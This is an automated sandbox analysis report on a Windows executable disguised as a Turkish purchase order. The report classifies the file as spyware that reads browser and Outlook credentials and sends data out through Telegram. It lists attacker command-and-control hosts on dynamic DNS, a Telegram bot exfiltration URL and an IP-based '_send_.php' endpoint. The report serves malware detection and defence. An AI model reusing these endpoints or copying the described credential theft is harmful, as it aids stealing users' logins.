                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR
                Source: Yara matchFile source: 4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7468, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                11
                Process Injection
                11
                Masquerading
                1
                OS Credential Dumping
                31
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                11
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)51
                Virtualization/Sandbox Evasion
                Security Account Manager51
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Obfuscated Files or Information
                Cached Domain Credentials1
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync23
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636899 Sample: SC110-11#U3000Order_Z01G-00... Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 2 other IPs or domains 2->31 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 57 12 other signatures 2->57 8 SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe 4 2->8         started        12 svchost.exe 1 1 2->12         started        signatures3 53 Tries to detect the country of the analysis system (by using the IP) 27->53 55 Uses the Telegram API (likely for C&C communication) 29->55 process4 dnsIp5 25 SC110-11#U3000Orde...25 - H64PO1.exe.log, ASCII 8->25 dropped 59 Adds a directory exclusion to Windows Defender 8->59 15 SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe 15 2 8->15         started        19 powershell.exe 23 8->19         started        33 127.0.0.1 unknown unknown 12->33 file6 signatures7 process8 dnsIp9 35 api.telegram.org 149.154.167.220, 443, 54971 TELEGRAMRU United Kingdom 15->35 37 checkip.dyndns.com 193.122.130.0, 49699, 49702, 49704 ORACLE-BMC-31898US United States 15->37 39 reallyfreegeoip.org 104.21.64.1, 443, 49700, 49701 CLOUDFLARENETUS United States 15->39 41 Tries to steal Mail credentials (via file / registry access) 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 21 WerFault.exe 19 16 15->21         started        45 Loading BitLocker PowerShell Module 19->45 23 conhost.exe 19->23         started        signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe29%VirustotalBrowse
                SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe34%ReversingLabs
                SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe100%AviraHEUR/AGEN.1306911
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.64.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2014/03/2025%20/%2006:54:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            http://checkip.dyndns.org/false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.office.com/lBSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.ver)svchost.exe, 00000005.00000002.2366614968.00000202B9483000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ac.ecosia.org?q=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000005.00000003.1203600977.00000202B92A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                                high
                                                http://upx.sf.netAmcache.hve.15.drfalse
                                                  high
                                                  http://checkip.dyndns.orgSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=en4SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://chrome.google.com/webstore?hl=enSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aborters.duckdns.org:8081SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icoSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/v20SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.office.com/4SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://51.38.247.67:8081/_send_.php?LSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://anotherarmy.dns.army:8081SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://duckduckgo.com/chrome_newtabv20SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://checkip.dyndns.org/qSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://chrome.google.com/webstore?hl=enlBSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.orgSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20aSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://gemini.google.com/app?q=SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedSC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.org/xml/SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    149.154.167.220
                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                    62041TELEGRAMRUfalse
                                                                                                    193.122.130.0
                                                                                                    checkip.dyndns.comUnited States
                                                                                                    31898ORACLE-BMC-31898USfalse
                                                                                                    104.21.64.1
                                                                                                    reallyfreegeoip.orgUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    IP
                                                                                                    127.0.0.1
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1636899
                                                                                                    Start date and time:2025-03-13 08:48:16 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 6m 39s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:19
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:SC110-11Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/16@3/4
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 98%
                                                                                                    • Number of executed functions: 93
                                                                                                    • Number of non-executed functions: 24
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 23.199.214.10, 13.89.230.12, 52.149.20.212, 20.190.159.68
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobvmssprdcus03.centralus.cloudapp.azure.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    TimeTypeDescription
                                                                                                    03:49:15API Interceptor273x Sleep call for process: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe modified
                                                                                                    03:49:17API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                                    03:49:25API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                    03:49:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    149.154.167.220y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                      https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                        https://possibles-x.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP Keylogger